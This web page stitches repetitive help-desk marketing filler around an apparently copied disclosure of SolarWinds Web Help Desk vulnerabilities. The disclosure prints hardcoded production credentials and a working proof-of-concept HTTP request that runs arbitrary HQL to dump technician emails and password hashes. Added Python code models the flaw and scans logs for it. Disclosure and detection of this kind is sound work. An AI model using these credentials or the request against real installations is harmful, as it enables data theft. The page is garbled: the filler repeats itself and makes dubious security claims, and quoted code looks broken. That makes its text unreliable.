
Benefits Of Web Help Desk Software

A Web Help Desk is a software solution for managing and automating remote assistance tickets. It allows users to create FAQs and Knowledge Base articles, promoting end-user self-service, and its built-in reporting and dashboards provide essential insights and metrics for your company. Self-service through knowledge base articles and FAQs also reduces overhead costs. In addition, it automates escalation processes and enables mobile notifications.

In addition to the various features of the program, a web help desk is also connected to a panel. With this feature, the user can configure their accounts at a web browser level. Since the software is accessible from anywhere, it doesn’t require a server or any IT expertise. It is also accessible anytime, anywhere. With a web-based system, it’s easy to use and adapts to the needs of growing businesses.

Web help desk software

A Web Help Desk can discover assets and associate them with end-users, as well as help desk tickets, thus providing a complete audit trail. This audit trail can help identify costly repairs and inform asset replacement decisions. A Web Help Desk can be configured to take full control of incident management. It can also automatically convert emails into tickets, route them to staff groups, and enable automatic escalation based on business requirements. It also features a comprehensive audit trail of help desk tickets.

A web help desk can be connected to a panel, which makes it easier to manage. The configuration of this program is performed at the web browser level, which means it is easy to use, no matter how many people access it. Moreover, it doesn’t require any IT expertise, which makes it the perfect solution for businesses with a wide variety of customer support needs. There are even cloud-based versions of this software that adapt to changing requirements.

What is the Solarwinds Web Help Desk and how can it help you?

Marketing materials by Solarwinds:

Solarwinds Web Help Desk allows you to manage all end-user troubles tickets and track the service request lifecycle from ticket creation through resolution from one central help desk management web interface.

Web Help Desk makes it easy to submit help desk tickets, manage IT assets and provide end-user support.

The Attack Surface Map

WebObjects

While exercising the web application, we discovered that Web Help Desk also used a framework called WebObjects. The following is an example of an HTTP request path handled by the WebObjects component:

/helpdesk/WebObjects/Helpdesk.woa/ra/configuration/database/test.json 

The routing was not clear to us. The file did not provide any information about the HTTP request we saw while using the web application. Analysing the file did, however, reveal that there was also a Spring application.

Since the file gave no indication of how this route was declared and mapped, we did some very basic searches through the codebase to determine where it was being mapped.

In our experience, routes do not always correspond literally to the request. Other mechanisms may supply details such as the .json extension. This is a common convention you may have encountered when auditing Ruby on Rails applications.

To locate the routing of the application, we used a simple but effective regex, database.*test. The query returned the following match:

/whd/helpdesk/WEB-INF/lib/com/macsdesign/whd/ui/Application.java:
    routeRequestHandler.addRoute(new ERXRoute("HelpdeskInitializer", "/configuration/database/test", ERXRoute.Method.Put, WhdInitializationController.class, "testDatabaseSettings"));

Perfect. This is what the WebObjects routes look like. The Application.java file contains the routes for the WebObjects components of this application.

Spring

As we mentioned, the file suggested that there was also a Spring application running in Web Help Desk. As we are familiar with Spring, it was easier to identify the attack surface for this part of the application.

It is a good idea to search the code base for @RequestMapping in order to identify all Spring routes. This returned a large number of controllers with routes mapped through the Spring Framework.

Discovery Process

We’ve already mapped the routes and have a good idea of what is accessible and exposed in the web application. However, we decided to look through the remaining files in the code base in order to find any obvious omissions.

We went through all JSP files in Web Help Desk and found the following JavaScript in one of them.

/whd/helpdesk/WEB-INF/jsp/test/orionIntegrationTest.jsp:

function callAddNoteToOrionAlert(frm) {
    startAPIcall();
    try {
        ... omitted for brevity ...
        var auth = {loginName:'helpdeskIntegrationUser', password:'dev-C4F8025E7'};
        RestInvokeAuth("/integration/orionAlertSource/"+id+"/alert/addNote", "POST", data, auth);
    } catch (err) {
        failedAPIcall(err);
    }
}

We noticed that these credentials had been hardcoded in a client-side API call, so we searched the codebase to see what access they would grant us.

We found more credentials declared at /whd/helpdesk/WEB-INF/lib/com/solarwinds/whd/common/ConstantsAndSettings.java:

package com.solarwinds.whd.common;

public abstract class ConstantsAndSettings {
    public static final String DEVELOPMENT_SPRING_PROFILE = "development";
    public static final boolean HELPDESKINTEGRATION_ENABLE_DEV_ANYADDRESS = true;
    public static final boolean HELPDESKINTEGRATION_ENABLE_DEV_LOGIN = true;
    public static final String HELPDESKINTEGRATION_REALM_NAME = "Helpdesk integration";
    public static final String HELPDESKINTEGRATION_PRODUCTION_LOGINNAME = "helpdesk91114AD77B4CDCD9E18771057190C08B";
    public static final String HELPDESKINTEGRATION_PRODUCTION_PASSWORD = "1A11E431853F4CC99C27BF729479EB5D";
    public static final String HELPDESKINTEGRATION_DEVELOPMENT_LOGINNAME = "helpdeskIntegrationUser";
    public static final String HELPDESKINTEGRATION_DEVELOPMENT_PASSWORD = "dev-C4F8025E7";
    public static final long SSOAUTH_RECHECK_INTERVAL = 15000L;
    public static final String PRIVILEGED_NETWORKS_PROPERTY = "WHDPrivilegedNetworks";
}

Reading the above, we discovered that the application contained two sets of hardcoded credentials: one for development and one for production. This distinction was crucial, because only the production credentials were used in our final exploit.

With the hardcoded credentials in hand, we searched the codebase for any authentication logic that relied upon them.

These credentials were accepted at multiple places in the source code:

  • /whd/helpdesk/WEB-INF/lib/com/macsdesign/whd/rest/controllers/BasicAuthRouteController.java – Accepts both development and production credentials
  • /whd/helpdesk/WEB-INF/lib/com/solarwinds/whd/service/impl/auth/HelpdeskIntegrationAuthenticationManager.java – Accepts both development and production credentials
  • /whd/helpdesk/WEB-INF/lib/com/solarwinds/whd/service/impl/auth/ClusterNodeAuthenticationManager.java – Only accepts production credentials

To determine which authentication managers were in use, we referred to whd/helpdesk/WEB-INF/lib/whd-security.xml, which declared this information like so:

... omitted to save space...

We now had an understanding of the attack surface as well as the authentication requirements for the different routes within the application. It was time to dig into the logic of HelpdeskIntegrationAuthenticationManager, as we were interested in an endpoint under the /assetReport/ path.

The source code for HelpdeskIntegrationAuthenticationManager.java can be found below:

WebAuthenticationDetails details = (WebAuthenticationDetails)token.getDetails();

boolean isDevelopment = this.environment.acceptsProfiles(new String[] { "development" });
boolean validCredentials = false;
if ("helpdesk91114AD77B4CDCD9E18771057190C08B".equals(loginName) && "1A11E431853F4CC99C27BF729479EB5D".equals(password)) {
    validCredentials = true;
} else if (isDevelopment && "helpdeskIntegrationUser".equals(loginName) && "dev-C4F8025E7".equals(password)) {
    validCredentials = true;
}
boolean isAllowedAddress = InternalCommunicationUtils.isAllowedAddress(details.getRemoteAddress(), isDevelopment);
if (isAllowedAddress) {
    if (validCredentials) {
        SimpleGrantedAuthority simpleGrantedAuthority = new SimpleGrantedAuthority("ROLE_INTEGRATION");

        UsernamePasswordAuthenticationToken result = new UsernamePasswordAuthenticationToken(null, password, Arrays.asList(new GrantedAuthority[] { (GrantedAuthority)simpleGrantedAuthority }));
        result.setDetails(token.getDetails());
        return (Authentication)result;
    }
}
throw new BadCredentialsException(this.messages.getMessage("AbstractUserDetailsAuthenticationProvider.badCredentials"));

Let’s get down to it.

  • token.getDetails(); – this sets this.remoteAddress to request.getRemoteAddr()
  • boolean isDevelopment – this evaluates to false by default, since the development profile is not active
  • else if (isDevelopment && "helpdeskIntegrationUser" ... – this block of code therefore won't run
  • InternalCommunicationUtils.isAllowedAddress – checks whether request.getRemoteAddr() is a loopback address
  • new SimpleGrantedAuthority("ROLE_INTEGRATION"); – if all conditions pass, we are granted ROLE_INTEGRATION

You may be thinking that we won't be able to take this any further, because InternalCommunicationUtils.isAllowedAddress checks that our request comes from a loopback address.

Here is the fun part. When Solarwinds Web Help Desk is deployed behind a reverse proxy on the same host, this check provides no protection: request.getRemoteAddr() returns the proxy's loopback IP address, so isAllowedAddress evaluates to true and the request proceeds.

Later, we confirmed our suspicions when we found numerous deployments in the wild that could be exploited this way. In our opinion, the loopback check is a temporary fix for a larger architectural problem: the authentication design ignores basic security principles.
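To make the failure mode concrete, here is a small Python model (an added example, not code from the Assetnote write-up or from Web Help Desk) of the decision the authentication manager above makes, alongside a hypothetical hardened variant. It assumes that isAllowedAddress accepts any address when the development profile is active, as the HELPDESKINTEGRATION_ENABLE_DEV_ANYADDRESS constant suggests; the function and parameter names are ours.

```python
import hmac
import ipaddress
from typing import Optional

# Credentials quoted from the page's ConstantsAndSettings.java.
PROD_LOGIN = "helpdesk91114AD77B4CDCD9E18771057190C08B"
PROD_PASSWORD = "1A11E431853F4CC99C27BF729479EB5D"
DEV_LOGIN = "helpdeskIntegrationUser"
DEV_PASSWORD = "dev-C4F8025E7"


def is_allowed_address(remote_addr: str, is_development: bool) -> bool:
    """Model of InternalCommunicationUtils.isAllowedAddress. Assumption: loopback
    only in production; any address when the development profile is active."""
    if is_development:
        return True
    return ipaddress.ip_address(remote_addr).is_loopback


def authenticate(login: str, password: str, remote_addr: str,
                 is_development: bool = False) -> Optional[str]:
    """Model of HelpdeskIntegrationAuthenticationManager: returns the granted
    authority, or None where the real code throws BadCredentialsException."""
    valid = (login == PROD_LOGIN and password == PROD_PASSWORD) or (
        is_development and login == DEV_LOGIN and password == DEV_PASSWORD)
    if is_allowed_address(remote_addr, is_development) and valid:
        return "ROLE_INTEGRATION"
    return None


def peer_address_seen_by_app(client_ip: str, proxy_on_same_host: bool) -> str:
    """request.getRemoteAddr() is the TCP peer of the servlet container. Behind a
    reverse proxy on the same host that peer is the proxy's loopback address,
    whatever the real client's address was."""
    return "127.0.0.1" if proxy_on_same_host else client_ip


def authenticate_hardened(login: str, password: str,
                          configured_login: Optional[str],
                          configured_password: Optional[str]) -> Optional[str]:
    """Hypothetical corrected design: no built-in credential exists, the operator
    must configure one, comparison is constant-time, and network position is not
    treated as an authentication factor at all."""
    if not configured_login or not configured_password:
        return None  # integration stays disabled until a secret is configured
    # '&' rather than 'and' so both comparisons always run.
    ok = hmac.compare_digest(login.encode(), configured_login.encode()) & \
        hmac.compare_digest(password.encode(), configured_password.encode())
    return "ROLE_INTEGRATION" if ok else None


if __name__ == "__main__":
    # A remote client on 203.0.113.7 (documentation range) reaches the app via a local proxy.
    print(authenticate(PROD_LOGIN, PROD_PASSWORD, peer_address_seen_by_app("203.0.113.7", True)))
```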

We now have some authentication to Solarwinds Web Help Desk via the hardcoded credentials. What is the worst that we can do?

We found the following code after analysing the Spring controllers now accessible with our hardcoded credentials:

@RequestMapping(value = "/rawHQL", method = RequestMethod.POST)
@ResponseBody
@ResponseStatus(HttpStatus.OK)
public String getStringResult(@RequestBody String selectHQL) throws Exception {
    logger.debug("Received request for result of this hql=", selectHQL);
    return this.assetReportService.getStringHQLResult(selectHQL);
}

Tracing the code for this.assetReportService.getStringHQLResult, we found the following sink:

public String getStringHQLResult(String hql) {
    String result = "";
    Query query = this.entityManager.createQuery(hql);
    List items = query.getResultList();

    result = result + result;
    return result;
}

It was somewhat surreal to find this controller: an endpoint that evaluates any arbitrary HQL query we hand it.

We could write HQL queries against any table for which the codebase contained a Hibernate Java class.

It seems so simple, let’s see if we can make it work.

True story: we spent more than an hour in Burp Suite trying to work out why this endpoint would not execute our queries despite the HQL syntax being correct. We were very confused.

It is a simple POST request; how hard could exploiting this issue be? This is what we saw:

"reason":"org.hibernate.hql.internal.ast.QuerySyntaxException: unexpected token: Cpassword near line 1, column 15 [select+email%2Cpassword+from+Tech=]" 

The request body was being URL-encoded (note the %2C in place of the comma), which turned the query into something that Hibernate rejected with a syntax exception.

We were willing to spend another hour debugging this, but a colleague suggested sending the request with Content-Type: text/plain.

Finally, it worked.

PoC

To exploit this bug, request.getRemoteAddr() must evaluate to a loopback address, which happens when the reverse proxy runs on the same host.

Below is a proof-of-concept of this vulnerability:

POST /helpdesk/assetReport/rawHQL HTTP/1.1
Host: re.local:8081
Accept: text/javascript, text/html, application/xml, text/xml, */*
X-Prototype-Version: 1.7
DNT: 1
X-XSRF-TOKEN: 712c84a6-b963-441a-9e2a-f16abdeafe39
X-Requested-With: XMLHttpRequest
Authorization: Basic aGVscGRlc2s5MTExNEFENzdCNENEQ0Q5RTE4NzcxMDU3MTkwQzA4QjoxQTExRTQzMTg1M0Y0Q0M5OUMyN0JGNzI5NDc5RUI1RA==
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.81 Safari/537.36
Referer: http://re.local:8081/helpdesk/WebObjects/Helpdesk.woa/wo/25.7.11.0.6.1.1.3
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: whdticketstab=mine; XSRF-TOKEN=712c84a6-b963-441a-9e2a-f16abdeafe39;
Connection: close
Content-Type: text/plain
Content-Length: 31

select email,password from Tech

The following will be returned:

HTTP/1.1 200
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
X-XSS-Protection: 1; mode=block
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: 0
Content-Type: text/javascript;charset=ISO-8859-1
Content-Length: 64
Date: Thu, 21 Oct 2021 03:35:11 GMT
Connection: close

[email protected] SHAuCLxzS3PxoW0foPjmAKJ_V2OP_OoLe8k19HWi7Jy6zI
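For defenders, the request and response above give two indicators that a reverse proxy in front of Web Help Desk would record: the /helpdesk/assetReport/rawHQL path and, in nginx's combined log format, the hardcoded login name in the $remote_user field. The following Python (an added example, not part of the original write-up) runs those indicators over constructed sample lines; the log lines, client addresses and the integration path in the third line are made up.

```python
import re
from typing import Dict, List

# Indicators taken from the page: the vulnerable endpoint and the two hardcoded
# integration login names. nginx fills $remote_user from the Basic-auth header.
RAWHQL_PATH = "/helpdesk/assetReport/rawHQL"
HARDCODED_LOGINS = {
    "helpdesk91114AD77B4CDCD9E18771057190C08B",  # production
    "helpdeskIntegrationUser",                   # development
}

# nginx "combined" log format:
# $remote_addr - $remote_user [$time_local] "$request" $status $body_bytes_sent "$http_referer" "$http_user_agent"
LOG_RE = re.compile(
    r'^(?P<addr>\S+) - (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)


def analyse_line(line: str) -> List[str]:
    """Return the reasons (possibly none) a single access-log line is suspicious."""
    m = LOG_RE.match(line)
    if not m:
        return []  # unparseable line: not an nginx combined-format record
    reasons = []
    path = m.group("path").split("?", 1)[0]  # ignore any query string
    if path == RAWHQL_PATH:
        reasons.append("rawHQL endpoint")
    if m.group("user") in HARDCODED_LOGINS:
        reasons.append("hardcoded integration login")
    return reasons


def find_suspicious(lines) -> List[Dict[str, object]]:
    """Run the indicators over many log lines; report client address, path, status and reasons."""
    findings = []
    for line in lines:
        reasons = analyse_line(line)
        if reasons:
            m = LOG_RE.match(line)
            findings.append({"addr": m.group("addr"), "path": m.group("path"),
                             "status": int(m.group("status")), "reasons": reasons})
    return findings


# Constructed sample lines (not real traffic). The first is an ordinary console request,
# the second mirrors the PoC above, the third is a guess at the integration route.
SAMPLE_LOG = [
    '198.51.100.4 - - [21/Oct/2021:03:34:50 +0000] "GET /helpdesk/WebObjects/Helpdesk.woa/wo/25.7.11.0.6.1.1.3 HTTP/1.1" 200 8123 "-" "Mozilla/5.0"',
    '203.0.113.7 - helpdesk91114AD77B4CDCD9E18771057190C08B [21/Oct/2021:03:35:11 +0000] "POST /helpdesk/assetReport/rawHQL HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '203.0.113.9 - helpdeskIntegrationUser [21/Oct/2021:03:36:02 +0000] "POST /helpdesk/integration/orionAlertSource/1/alert/addNote HTTP/1.1" 401 0 "-" "curl/7.79.1"',
]

if __name__ == "__main__":
    for finding in find_suspicious(SAMPLE_LOG):
        print(finding)
```

A rawHQL request that was rejected (non-200 status) still matters: it shows someone probing for this issue, so the path indicator is reported regardless of status.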

Vendor Response

These issues were dealt with seriously by Solarwinds. We appreciate their cooperation in resolving this issue and in corresponding with us.

This issue was reported to Solarwinds on October 23, 2021.

Below is the timeline for this disclosure process:

  • October 23rd, 2021 – Disclosure of hardcoded credentials and HQL vulnerability to Solarwinds PSIRT
  • November 8th, 2021 – Response from Solarwinds confirms receipt of vulnerability
  • November 25th, 2021 – Response from Solarwinds confirms patch release date
  • December 23rd, 2021 – Response from Solarwinds confirms release of Web Help Desk 12.7.7 hotfix 1

Solarwinds' advisory provides satisfactory details that will help ensure the vulnerability is not exploited. Their knowledge base article details the workarounds and patches to be applied.

Conclusion

Solarwinds Web Help Desk contained hardcoded credentials. These credentials allowed access to sensitive controllers capable of running arbitrary HQL queries. An attacker could use this vulnerability to modify, update, delete or insert nearly any information in the database.

Assetnote’s Security Research Team is constantly looking for security flaws in enterprise software as part of our Continuous Security Platform development. This helps customers to identify security problems across their attack surface.

This research shows that organizations using enterprise software often have poor visibility into, or misunderstand, the associated risks. Organizations tend to focus too much on network and in-house issues, at the expense of visibility and awareness of third-party software. We have seen that many vulnerabilities remain in enterprise software, and they are not always obvious.

This vulnerability was first discovered by customers of our Attack Surface Management platform. Contact us if you’re interested in having a complete, real-time view of your attack surface.

Assetnote is Hiring!

For current opportunities, please visit our careers page. Even if you don’t see any open positions in your field, we are always looking for the best talent.

An important benefit of a Web Help Desk is that it is easy to use and is customizable. Users can access information and configure settings at the web browser level, and can even manage customer tickets and IT assets. These systems are great for businesses that require a flexible and user-friendly system. These programs are also highly secure and can be used to streamline help desk ticket management processes. You can choose to purchase one that includes additional tools to manage customer service requests.

A Web Help Desk allows you to keep track of your assets. By automatically discovering and assigning computer hardware and software assets to specific users, you can easily manage your IT assets and ensure they are in good condition. Your employees will appreciate the automated inventory alerts, which will streamline your IT inventory planning and minimize costs. Using this software for your IT asset management tasks will save you time. The web help desk will also automate your inventory and help you manage it more effectively.

A Web Help Desk connects with a panel, allowing you to configure it from anywhere. The configuration is available at the web browser level, and all you need is an Internet connection. The software is connected to a panel, so you do not need to worry about security. The best part is that it is completely customizable, allowing your staff to customize it to suit their needs. It also gives you the flexibility to set different settings for different departments.

A web help desk connects to a panel for easy monitoring and management. Its web browser is the main interface, which allows users to configure the system to their liking. Most of the software will also work with your existing IT department, so you can focus on improving the customer experience. However, there are some limitations to using a cloud-based software. A cloud-based application allows for customization and is available at all times. The system is accessible from any computer, which is a great feature if you have a limited amount of staff.

A web help desk can be connected to a panel. Depending on your needs, a web help desk can be connected to an email system. The main benefit is that you can automate the entire customer support process through the use of a website. This helps your employees to be more efficient and productive. You can automate the process and track assets, ensuring that it is easy to solve problems and improve the quality of service.
